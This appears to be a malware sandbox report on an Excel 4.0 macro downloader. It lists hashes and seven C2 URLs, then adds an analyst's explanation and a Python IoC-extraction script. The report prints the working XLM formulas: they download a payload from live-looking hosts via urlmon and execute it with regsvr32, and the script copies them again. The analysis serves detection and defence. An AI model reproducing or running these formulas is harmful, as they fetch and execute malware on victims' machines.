General

  • Target

    43447fb4eca835dc3ee164926a695d72c4fe4557503766d08417604207967900

  • Size

    38KB

  • MD5

    14a5b683d63be536a46f49b448767eff

  • SHA1

    ca835d420edffbad031e671b9674f544671a8da8

  • SHA256

    43447fb4eca835dc3ee164926a695d72c4fe4557503766d08417604207967900

  • SHA512

    a740840a6d55765782872e297bfb7d2fa21c4d5725309139b470135d1e81fa5b33145029c12bfb5016e299eb1022239e606ed35b4780102ebfbb3e2735e70e65

  • SSDEEP

    768:WhACdvR8DjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIyI:D65YOZZ1ZYpoQ/pMAeVIybs/

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://www.rivabodrumresort.com/eski_site/cM2jewS/

https://www.kinfri.com/licenses/IHECi5VMo0SY2MD/

https://localart.net/wp-content/uploads/5rH1dzF11HBD/

https://globaltextiles.net/cgi-bin/M2Gi8MLnY/

https://onceintheflow.com/wp-includes/SimplePie/x6zEwt/

https://sarc.in/wp-admin/ktPHMSvi/

https://www.iinil.com/phpmyadmin/bMnR/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.rivabodrumresort.com/eski_site/cM2jewS/","..\roil.ocx",0,0)
    =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.kinfri.com/licenses/IHECi5VMo0SY2MD/","..\roil.ocx",0,0))
    =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://localart.net/wp-content/uploads/5rH1dzF11HBD/","..\roil.ocx",0,0))
    =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://globaltextiles.net/cgi-bin/M2Gi8MLnY/","..\roil.ocx",0,0))
    =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://onceintheflow.com/wp-includes/SimplePie/x6zEwt/","..\roil.ocx",0,0))
    =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://sarc.in/wp-admin/ktPHMSvi/","..\roil.ocx",0,0))
    =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.iinil.com/phpmyadmin/bMnR/","..\roil.ocx",0,0))
    =IF('HUNJK'!E27<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\roil.ocx")
    =RETURN()

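Reading the formulas above as a chain: the first CALL to urlmon!URLDownloadToFileA is unconditional, and each following download is wrapped in IF('HUNJK'!Exx<0, ...). A failed HRESULT has its top bit set and is negative as a signed 32-bit value (the "J" return type in "JJCCBB"), so each guard means "try this URL only if the previous download failed". The guard cells are read here as the cells holding the preceding CALL's result; that is an interpretation of the formulas, since the report does not show the sheet layout. If the last download also fails, CLOSE(0) abandons the workbook; otherwise EXEC runs 32-bit regsvr32.exe -s on the dropped file, which loads the DLL and calls its DllRegisterServer export silently, so the ".ocx" name is cosmetic. In practice a victim machine therefore contacts only the first URL that answers, not all seven. The script below is an added example written for this page, not code from the sandbox that produced the report: it takes the extracted formulas (copied from the "formulas" attribute), splits a run-together dump back into cells, and recovers the URL fallback order, the drop path, the abort step and the execution command as IoCs. It is a regex approximation fitted to this loader family, not a general XLM interpreter.

```python
"""Recover the download chain and execution step from Excel 4.0 (XLM) macro
formulas of the kind extracted from this sample. Added example for this page,
not sandbox code; SAMPLE_FORMULAS are copied from the report's attributes."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One cell per entry, exactly as the sandbox extracted them (copied from the report).
SAMPLE_FORMULAS = [
    r"""=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.rivabodrumresort.com/eski_site/cM2jewS/","..\roil.ocx",0,0)""",
    r"""=IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.kinfri.com/licenses/IHECi5VMo0SY2MD/","..\roil.ocx",0,0))""",
    r"""=IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://localart.net/wp-content/uploads/5rH1dzF11HBD/","..\roil.ocx",0,0))""",
    r"""=IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://globaltextiles.net/cgi-bin/M2Gi8MLnY/","..\roil.ocx",0,0))""",
    r"""=IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://onceintheflow.com/wp-includes/SimplePie/x6zEwt/","..\roil.ocx",0,0))""",
    r"""=IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://sarc.in/wp-admin/ktPHMSvi/","..\roil.ocx",0,0))""",
    r"""=IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.iinil.com/phpmyadmin/bMnR/","..\roil.ocx",0,0))""",
    r"""=IF('HUNJK'!E27<0,CLOSE(0),)""",
    r"""=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\roil.ocx")""",
    r"""=RETURN()""",
]

# CALL type string "JJCCBB": return J (int32 HRESULT), args J,C,C,B,B; the two
# C (C-string) args are URLDownloadToFileA's szURL and szFileName.
DOWNLOAD_RE = re.compile(r'CALL\("urlmon","URLDownloadToFileA","[A-Z]+",[^,]*,"([^"]+)","([^"]+)"')
# =IF('Sheet'!Cell<0, ...): a failed HRESULT is negative as int32, so the
# guarded step only runs when the previous download failed.
GUARD_RE = re.compile(r"^=IF\('?([^'!]+)'?!([A-Z]{1,3}\d+)<0,")
EXEC_RE = re.compile(r'EXEC\("([^"]+)"\)')


@dataclass
class DownloadStep:
    url: str
    drop_path: str
    guard_cell: Optional[str]  # None means the step is unconditional


@dataclass
class MacroChain:
    steps: List[DownloadStep] = field(default_factory=list)
    aborts_if_all_fail: bool = False
    exec_commands: List[str] = field(default_factory=list)

    def urls(self) -> List[str]:
        return [s.url for s in self.steps]

    def drop_paths(self) -> List[str]:
        return sorted({s.drop_path for s in self.steps})

    def is_fallback_chain(self) -> bool:
        """Only the first download is unconditional, every later one is gated
        on the previous result: a live host contacts the first URL that works."""
        return (bool(self.steps) and self.steps[0].guard_cell is None
                and all(s.guard_cell is not None for s in self.steps[1:]))


def split_formula_blob(blob: str) -> List[str]:
    """Split formulas that were run together on one line (as in the report's
    attribute dump) back into one formula per cell."""
    return [f for f in re.split(r"\s+(?==)", blob.strip()) if f]


def parse_xlm_chain(formulas: List[str]) -> MacroChain:
    chain = MacroChain()
    for formula in formulas:
        formula = formula.strip()
        guard = GUARD_RE.match(formula)
        guard_cell = f"{guard.group(1)}!{guard.group(2)}" if guard else None
        download = DOWNLOAD_RE.search(formula)
        if download:
            chain.steps.append(DownloadStep(download.group(1), download.group(2), guard_cell))
        elif guard and "CLOSE(" in formula:
            chain.aborts_if_all_fail = True  # last fallback failed: give up quietly
        chain.exec_commands.extend(EXEC_RE.findall(formula))
    return chain


def iocs(chain: MacroChain) -> dict:
    """Flatten the chain into the indicators an analyst would block or hunt for."""
    return {"urls": chain.urls(), "drop_paths": chain.drop_paths(), "exec": chain.exec_commands}


if __name__ == "__main__":
    chain = parse_xlm_chain(split_formula_blob(" ".join(SAMPLE_FORMULAS)))
    print(f"{len(chain.steps)} download URLs, fallback chain: {chain.is_fallback_chain()}")
    for step in chain.steps:
        print(f"  {step.guard_cell or 'unconditional':>14}  {step.url} -> {step.drop_path}")
    print("abort if all fail:", chain.aborts_if_all_fail)
    print("exec:", *chain.exec_commands)
```

Because the chain is sequential, network telemetry from an infected host will usually show only one of the seven domains; block or hunt on the full list, and on the regsvr32.exe -s parent-child relationship from excel.exe, rather than on a single URL.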
Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with Excel 4.0 (XLM) macros.

Files

  • 43447fb4eca835dc3ee164926a695d72c4fe4557503766d08417604207967900
    .xlsm office2007